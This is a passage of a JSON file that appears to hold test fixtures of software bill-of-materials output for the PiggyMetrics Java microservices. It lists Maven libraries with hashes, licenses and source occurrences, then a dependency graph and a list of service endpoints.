"account-service\\src\\main\\java\\com\\piggymetrics\\account\\client\\StatisticsServiceClient.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#13"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#20"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#25"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#30"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\AccountController.java#35"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#10"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#17"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\controller\\ErrorHandler.java#18"}, {"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\service\\security\\CustomUserInfoTokenServices.java#129"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#15"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#16"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#22"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\controller\\UserController.java#28"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\client\\AccountServiceClient.java#12"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#14"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#15"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#21"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\controller\\RecipientController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\client\\ExchangeRatesClient.java#13"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#14"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#20"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#26"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsController.java#32"}]}, "group": "org.springframework", "hashes": [{"alg": "SHA-1", "content": "2e04c6c2922fbfa06b5948be14a5782db168b6ec"}, {"alg": "SHA3-384", "content": "797a7bd86ef730de5377d6fc66c1b7d03188260b62fbb72a58fbc025926877bbc94b5a7c7a03e4f4e1c0b12fe9a3df13"}, {"alg": "SHA-384", "content": "8af38fbf471db8437161cca583b115bad2084544661de14b98f023013eac4a735e7f820bdaf72118e55b5cbaf78cf1da"}, {"alg": "MD5", "content": "cdb97ca6e419ea429244db6b01ea9d09"}, {"alg": "SHA-256", "content": "d100479905e911a3201de66566f59bd5e2d4137f9d95b6d314acbb80ae985d22"}, {"alg": "SHA-512", "content": "da438577b4aeb0722ecfcaccfc43a37a07c78fdd6badc87caceb3abe58f31f82df9199e26a6b889a24bfe30cdf47626fbe8c4eb68e0f49497bd4b34e99f88b66"}, {"alg": "SHA3-512", "content": "e15fe01672fed6048e69d14ff865ce2986343d339c4ed806e5de0a2038b01a25dbbf457d3aa399692e8d8ad834c03e84619f683cd5bfee03facbf4500fbc51bb"}, {"alg": "SHA3-256", "content": "f86905c962d81e77ccdfeb4e189aad1cd22d015f7b35cb676a940e39aeb7c284"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-web", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}], "libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "type": "library", "description": "Core annotations used for value types, used by Jackson data binding package.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-annotations\\2.9.0\\jackson-annotations-2.9.0.jar"}]}, "occurrences": [{"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\domain\\ExchangeRatesContainer.java#9"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA-1", "content": "07c10d545325e3a6e72e06381afe469fd40eb701"}, {"alg": "SHA-512", "content": "266589c36ea544ebca94aecd76ba9dfe88637563b94cf24e46846466b103074c9f95508bfa237c20d0ab9c60bfb6befa2628236dcf7222a69cf1ef9462bcf0b3"}, {"alg": "SHA-384", "content": "36289e4a5d6774c4fc6ed38a632a681759a4bc0389616a79edd22298dbcbe8f1bc7a107f00a9ec76b492d125c890a939"}, {"alg": "SHA-256", "content": "45d32ac61ef8a744b464c54c2b3414be571016dd46bfc2bec226761cf7ae457a"}, {"alg": "SHA3-256", "content": "5ad4c52561d43e8f80798256ae39449955b2d34376d3fbb9f354f9fcb61f477a"}, {"alg": "SHA3-512", "content": "8322ba66c29bfa8152a4c6294f6c3350d7a59fce154ba9db8624e369085aae42585addf864f373d250f76e5678b5967ecac79aff9255d96e5c109f310424f208"}, {"alg": "MD5", "content": "c09faa1b063681cf45706c6df50685b6"}, {"alg": "SHA3-384", "content": "d575397eff488d8b2e2098f1bcc8c0a7d49a3c0532ecec9c2996709576cf9fffe967f421dab2c4d2e280867efefd71af"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-annotations", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "scope": "required", "version": "2.9.0"}, {"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "type": "library", "description": "General data-binding functionality for Jackson: works on core streaming API", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-databind\\2.9.6\\jackson-databind-2.9.6.jar"}]}, "occurrences": [{"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#114"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#118"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#131"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#143"}, {"location": "auth-service\\src\\test\\java\\com\\piggymetrics\\auth\\controller\\UserControllerTest.java#51"}, {"location": "notification-service\\src\\test\\java\\com\\piggymetrics\\notification\\controller\\RecipientControllerTest.java#53"}, {"location": "statistics-service\\src\\test\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsControllerTest.java#114"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-512", "content": "480f9d8a7e5c2cb7ff981b3e004708dd632f8c472a8da3114486499a15a4bfa21ee4904e4ac5f0d1aef4dccd19fc95ceb1f9f6d5a65ea13ca2a7d9815585f82e"}, {"alg": "SHA-256", "content": "657e3e979446d61f88432b9c50f0ccd9c1fe4f1c822d533f5572e4c0d172a125"}, {"alg": "SHA-384", "content": "80682058957cb75863d94f0ed223dc69cad95526e41b80d2810bfb04308c6fbd4bf4df90f43edacd8f820d43296b61ea"}, {"alg": "SHA3-256", "content": "885a3161af0a28a56a7d41631034921b846f9b1b0e02062e0758b17337026bdf"}, {"alg": "SHA3-384", "content": "a5682de7a39422fde523ad1d6fe2db75a4a390266692362e296115e06e07e515cb6b85598ada103e54031dbefc5ea7f3"}, {"alg": "MD5", "content": "c6634d654c2df15a987bc37ec8d2b6b2"}, {"alg": "SHA-1", "content": "cfa4f316351a91bfd95cb0644c6a2c95f52db1fc"}, {"alg": "SHA-512", "content": "f0861f775e2aebd61df8a39419f959b61019af7b307812b92beb14d7a234edeaf09c054fbb24a1432f4dd0c726b7d2b535bdc3ecb8b3d00b661e01d4d46ec4be"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-databind", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "type": "library", "description": "Gson JSON library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\google\\code\\gson\\gson\\2.8.5\\gson-2.8.5.jar"}]}}, "group": "com.google.code.gson", "hashes": [{"alg": "MD5", "content": "089104cb90d8b4e1aa00b1f5faef0742"}, {"alg": "SHA3-512", "content": "0aed985c19435fb6d5e04a79a7553f56a66814157ac93addcb24f9286321d0063b69ac008501f0e22f691ecb15a50491d3313aee73a745286454817e2f410fe9"}, {"alg": "SHA-256", "content": "233a0149fc365c9f6edbd683cfe266b19bdc773be98eabdaf6b3c924b48e7d81"}, {"alg": "SHA-512", "content": "5dd7214c542a7b93aab3eab0ba13e4ac3d6ddb05c795fb6d3992e21925a98dce87cb186ac67b4d3ad146f96e14d38b3892837eca57a27b4e845aca6d4e4f708a"}, {"alg": "SHA-384", "content": "77f4d6efe8d9cf78b72f34e439035d266db1b82c9d96e6b78e6c571d4c719bb5f2b78e8377263280c6cc9dffe18b3d16"}, {"alg": "SHA3-256", "content": "94cde12c15a685a10309653cfef73d14d09b340f1b8f0a9a04267136e9bf2820"}, {"alg": "SHA3-384", "content": "953e2eca6de4a05e1cf86a9750aa9f1d10bfd06a15f7eaab4a59716cbec74a7bf6c5f421b1752d487882954daecc5781"}, {"alg": "SHA-1", "content": "f645ed69d595b24d4cf8b3fbb64cc505bede8829"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "gson", "purl": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "scope": "required", "version": "2.8.5"}, {"bom-ref": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "type": "library", "description": "eureka-client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\eureka\\eureka-client\\1.9.2\\eureka-client-1.9.2.jar"}]}}, "group": "com.netflix.eureka", "hashes": [{"alg": "SHA-256", "content": "279fc7616a9c0c904dd11ba53aaeec0790d35511cbda2a81e8606b6c6a13c7f3"}, {"alg": "SHA3-256", "content": "2ed92d790b33a71dcc8de331d77bdde3c823ced8521ad0cd6e1f75430fdb04bf"}, {"alg": "SHA-512", "content": "3abb8075ff7ece646f8ae62c840a8b79b1163741a41e84a7dd7af939f554c6e2f9057ca901d10fe639b693fb9223a2f74bce00743b421a9263acdb246eeee7cb"}, {"alg": "SHA-1", "content": "47c0b71d8face149833c4958ac7b3b6171861f4c"}, {"alg": "SHA-384", "content": "99475120ea6b3ca18098f3346fe2a7ca539a472d2110e0aedf96d941403a1f37049df31785d1e4e3257adf44d0a5630a"}, {"alg": "SHA3-512", "content": "b0f8d56fa259be87844612709b83ba3611548215d405ecd02220a22e1539d2666a5cf37b51ca618291f92dbb007dfd4a6dfa037905bfd0d313b8221cc2605c5b"}, {"alg": "SHA3-384", "content": "b7a195e9f54f4189c8e27624ba44c5ff191ffe977d6e70ffc6d1795a4f4d4d3869d15992e555eed71cb427f744fd3b9b"}, {"alg": "MD5", "content": "f1a16ca3654e743409bb60c47eb02f01"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "eureka-client", "purl": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "scope": "required", "version": "1.9.2"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "type": "library", "description": "netflix-eventbus", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-eventbus\\0.3.0\\netflix-eventbus-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-512", "content": "13549ecc52b63986900eefd48441f78687a5ac0f89d752752f3c973e7d664607785a6b8850ef7ab6181cc4f90580301cc0a19f2fc694e3f97d9776bd43f416e9"}, {"alg": "SHA-384", "content": "192c415c11edbc320d0d7b2f41c485bae7dbc20d9f406d0b05a5d02436a005a72d4dc015190748749ac74314f20c496b"}, {"alg": "SHA-256", "content": "387bce0906f22c285ed96bcc520a7581d6abbc418b6c3c1e45a4530eb97d94b1"}, {"alg": "SHA-1", "content": "3f864adbe81f0849729fcbba3fe693c32be739ea"}, {"alg": "SHA3-256", "content": "840ce15c01ed37b974b4c5ab4a75d539afb6c43cad90437504d23884864735d5"}, {"alg": "MD5", "content": "8ad05394a13f658a67d1e4cbf0359402"}, {"alg": "SHA-512", "content": "94a6efc1be744e281211f7856037c057863ad67ee1a45bd4cfc1adbb15216a6cb20ba0d54caa26d902f653efe496098b5e71eb5b2c466b10deb94af7559f67a0"}, {"alg": "SHA3-384", "content": "d8580812de33ef27de8dc91205cf56b2aec19572fcfc7fd49e723ed17e4eb4d853f99627417bd9bd30f1cd7de24b4dcf"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-eventbus", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "type": "library", "description": "netflix-infix", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-infix\\0.3.0\\netflix-infix-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-256", "content": "14f1ba7c66c7b18a45bb2949f784d9028911bdf80376e1553bd9ed6d15083720"}, {"alg": "SHA-384", "content": "185629545fd32a7b890c4318cb7979f0475fa42e54039c80105c4eb20efbe5eabf0338ab59256440fc6366e9bc84d0e4"}, {"alg": "MD5", "content": "3410072887ca26fc0b7e71a7e91f8e2b"}, {"alg": "SHA-512", "content": "477278c1d16d6753a1a2acdb0edd8189b069db1828dd34d808985b48924257e0971ec190bf6efafb14b962e3e0158f2221c195a83fe9bd38fb1574e6cdbf90d3"}, {"alg": "SHA3-384", "content": "7aa7b6c88a89c3324677846543b54b5151d45370d48309a529e492576c64174958f22564ed0d5b88a24d5b0696554326"}, {"alg": "SHA-256", "content": "7dec45215c262c4f0a42c1f3adb8613788cf43c6ed21274e15c73ea5500d2597"}, {"alg": "SHA-1", "content": "acc65969f7367ddd2f1265e0cd7330509ed530dc"}, {"alg": "SHA3-512", "content": "e0b9054727385449f0d29062959eed8ca5f4dec126b85c82fd04155b136ecdf5a4dc1cb78b837f5ff3b86f72b3241d4507f0d4008f519aced1ff2637eb6df3c5"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-infix", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "type": "library", "description": "A Java-based implementation of XPath 1.0 that, in addition to XML processing, can inspect/modify Java object graphs (the library's explicit purpose) and even mixed Java/XML structures.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\commons-jxpath\\commons-jxpath\\1.3\\commons-jxpath-1.3.jar"}]}}, "group": "commons-jxpath", "hashes": [{"alg": "SHA-384", "content": "327139dac9f672ffa772480a754ec6c3125a3057faf7911188a34cc52d088770efe8464bb303e2347be7f55303d24493"}, {"alg": "SHA-512", "content": "351c5f6af0711a955e5d839551833015956812765e9dc35e78bfd7c99656f1ecec5cf6587469229688340f00c2b5d07917993ccb0809561e0dd35b4ffb074d93"}, {"alg": "SHA3-256", "content": "3bbafe102ece8be037419a214a524f0c52fa0c3455322d3c2633f1c075e9efbc"}, {"alg": "MD5", "content": "61a9aa8ff43ba10853571d57f724bf88"}, {"alg": "SHA3-384", "content": "b2913b137433bfc2fe78ed57dc44de5737410947e809c0b8bb1d6a83ad333069e41fd97167c20e9fd3a052c2a7dfa9b8"}, {"alg": "SHA-1", "content": "c22d7d0f0f40eb7059a23cfa61773a416768b137"}, {"alg": "SHA3-512", "content": "e050591ecd10746ffee670e1e95a53afa8b43b01164c3ae581bce9ee0a5410eece3f71d05175486eb4d186de88d5defeebef52730939611951ca1cd50ec978a7"}, {"alg": "SHA-256", "content": "fcbc0ad917d9d6a73c6df21fac322e00d213ef19cd94815a007c407a8a3ff449"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-jxpath", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "scope": "required", "version": "1.3"}, {"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\joda-time\\joda-time\\2.9.9\\joda-time-2.9.9.jar"}]}}, "group": "joda-time", "hashes": [{"alg": "SHA3-256", "content": "22837a75e07c2c56cb3565e324f157f0850f9df62471293af3a77ec2ad456535"}, {"alg": "SHA-512", "content": "3a6749ecd71ee8d5781821c36d77850a810e72ee33757ec4ee9e3d424676dced7eeb955a432f45edb3694dc14dbe1ee4c608545d6a445b29b86979a7c9829384"}, {"alg": "SHA-384", "content": "76fadb1a66e6e6f9780aef2ca6ecfe6e07c0abb0829cc436c0ebf02186ba571219a290ec4bf1b510059594b146d39eff"}, {"alg": "SHA3-384", "content": "9f4b85b886cd0b78b1404522979c0bd150dfe27f01469a17e943d35f5fad2de37fd88f35c0f0d49613c81a6fc0a8cd6b"}, {"alg": "SHA-256", "content": "b049a43c1057942e6acfbece008e4949b2e35d1658d0c8e06f4485397e2fa4e7"}, {"alg": "SHA3-512", "content": "b7f8c9cac6086a5c7d861e5dfa9a42c1191ae17e9d9bfbae5eea2e1f6e25eb084fcb9bdc6bbb7d9c693d423452c9533b1216648793d5ca31675af23d1a0f0397"}, {"alg": "MD5", "content": "eca438c8cc2b1de38e28d884b7f15dbc"}, {"alg": "SHA-1", "content": "f7b520c458572890807d143670c9b24f4de90897"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}, {"bom-ref": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "type": "library", "description": "StringTemplate is a java template engine for generating source code, web pages, emails, or any other formatted text output. StringTemplate is particularly good at multi-targeted code generators, multiple site skins, and internationalization/localization. It evolved over years of effort developing jGuru.com. StringTemplate also generates the stringtemplate website: http://www.stringtemplate.org and powers the ANTLR v3 code generator. Its distinguishing characteristic is that unlike other engines, it strictly enforces model-view separation. Strict separation makes websites and code generators more flexible and maintainable; it also provides an excellent defense against malicious template authors. There are currently about 600 StringTemplate source downloads a month.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\stringtemplate\\3.2.1\\stringtemplate-3.2.1.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "SHA-512", "content": "47f3cfd91906b527b615fd10d27387aafa9f355aa9c18a86861c975091c39895b711fe514ed1597dabe6af2a2705dfc45bb70fb5e30f5d428a48e0d1b02b7856"}, {"alg": "SHA-1", "content": "59ec8083721eae215c6f3caee944c410d2be34de"}, {"alg": "SHA3-256", "content": "6181e67482392f97de747d04dc11418e54ca77888d1d1f6925563fe6a2c1633b"}, {"alg": "SHA-384", "content": "a12c2a95e162207835a2a785f2dfccd4b3d9d9b94741d1b3e171ff04699afc920c549425115c63a95c7941ead3909edf"}, {"alg": "MD5", "content": "b58ca53e518a92a1991eb63b61917582"}, {"alg": "SHA3-384", "content": "d9ccd03170058316ea8c98142afbecb7a3b357dda5cd1253c9b57810449048fae7d79e93d5ba74cb901bd765429d8714"}, {"alg": "SHA3-512", "content": "e75331f732a6c9e280f04438db65c47aa2efb4b07980ad3ce5e227693b47c5959d87e40590e19552f67dc257cc4f187a35ee112e850a6bda9d9e69bba2dba34c"}, {"alg": "SHA-256", "content": "f66ce72e965e5301cb0f020e54d2ba6ad76feb91b3cbfc30dbbf00c06a6df6d7"}], "licenses": [{"license": {"name": "BSD licence", "url": "http://antlr.org/license.html"}}], "name": "stringtemplate", "purl": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "scope": "required", "version": "3.2.1"}, {"bom-ref": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "type": "library", "description": "A StAX implementation for JSON.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\codehaus\\jettison\\jettison\\1.3.7\\jettison-1.3.7.jar"}]}}, "group": "org.codehaus.jettison", "hashes": [{"alg": "SHA-512", "content": "1304499b9951cba15f10486a061d91ec91efec7aa039162d5fa3d4effb60596fd1c73152fa46d170bbe065d98718f4c9354403bcee7aa3acd03d7b03aa45eeee"}, {"alg": "SHA-384", "content": "4cf5155094f09370f72e94768d6f1429662fb6dcfe6df00f91d78977d42a61dd62d51f1464d3d79eb7363ded95f53474"}, {"alg": "SHA3-384", "content": "5e88aeeb907a6b304a2125a01b55549633b64ce7a43469eff7fdb82ad9e3dfe2e48696c8fd184b2cec6e6062dd1079eb"}, {"alg": "SHA-1", "content": "7d36a59a0577f11b12088b9e215d6860345b9e1d"}, {"alg": "SHA-256", "content": "b39e77d92f5a682c639c8962980499e6be34b5c9fda7ad4dba3b5fd9e99b5070"}, {"alg": "MD5", "content": "c1ce879e927ca435da0fd2fd6c8a6b60"}, {"alg": "SHA3-512", "content": "c75a5dc446297a1eaac02f36829ea2891ffa5e9a3ca45a888f935d8cd65e6f3cab9c6410b45b36987c23674c243b9d6f0d4371f9efec92b70b92a4355732c329"}, {"alg": "SHA3-256", "content": "e8c94791fa652fbc24dbd55ce3fb3ad3cc703d576f935a4b4d2710148615cf9c"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jettison", "purl": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "scope": "required", "version": "1.3.7"}, {"bom-ref": "pkg:maven/stax/stax-api@1.0.1?type=jar", "type": "library", "description": "StAX API is the standard java XML processing API defined by JSR-173", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\stax\\stax-api\\1.0.1\\stax-api-1.0.1.jar"}]}}, "group": "stax", "hashes": [{"alg": "SHA3-384", "content": "03ebb8db88d04b7308570c1058aadfb6a81d3d6725b1dd13a049ea984ed1df42d3e0f8163e1229752228cada978fb462"}, {"alg": "SHA-384", "content": "2e6c232d3012064dc17e10c2e5b281728a6771eb0d74868e730caf60fe6f96fdd6145759fbbf9d1aa2e07eb1f49764d6"}, {"alg": "SHA-512", "content": "43c24e8dbffa9b932492c8ccf2b91926b2ba3d1d34b5a9671c689bd24d4c220b996708a9667521641d1abbf29404b653755b6f6f3dc0ad0671f5c09db332ea06"}, {"alg": "SHA-1", "content": "49c100caf72d658aca8e58bd74a4ba90fa2b0d70"}, {"alg": "MD5", "content": "7d436a53c64490bee564c576babb36b4"}, {"alg": "SHA3-256", "content": "8173e3e3a0db17b3dbb80c017268858ecda57c819e5b58dbe202bd8087664bb1"}, {"alg": "SHA-256", "content": "d1968436fc216c901fb9b82c7e878b50fd1d30091676da95b2edd3a9c0ccf92e"}, {"alg": "SHA3-512", "content": "e9a7c234dfeff5d4cabd034a536f31ad5a141e30b0ad2438cf5856dd6c36eeb16c69b8bc1ba3ee6bba91f69cd3cbd450953249f2f0eee0a9a22d49637b575f4d"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "stax-api", "purl": "pkg:maven/stax/stax-api@1.0.1?type=jar", "scope": "required", "version": "1.0.1"}]}, "dependencies": [{"ref": "pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-api@2.10.0?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "pkg:maven/org.slf4j/jul-to-slf4j@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar", "dependsOn": []}], "services": [{"name": "com-piggymetrics-account-controller-AccountController-getAccountByName-service", "endpoints": ["/{name}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-controller-AccountController-getCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-account-controller-AccountController-saveCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-auth-controller-UserController-getUser-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-notification-client-AccountServiceClient-getAccount-service", "endpoints": ["/accounts/{accountName}"]}, {"name": "com-piggymetrics-notification-controller-RecipientController-getCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-notification-controller-RecipientController-saveCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-client-ExchangeRatesClient-getRates-service", "endpoints": ["/latest"]}]}, "test/sbom-java2.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "type": "framework", "description": "JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\javax\\activation\\activation\\1.1\\activation-1.1.jar"}]}}, "group": "javax.activation", "hashes": [{"alg": "SHA-256", "content": "2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3"}, {"alg": "SHA3-256", "content": "5fb94d2742cc3d44abad42c5d61b9c7464a2ef33bc58b4b5b121d49799123460"}, {"alg": "MD5", "content": "8ae38e87cd4f86059c0294a8fe3e0b18"}, {"alg": "SHA-512", "content": 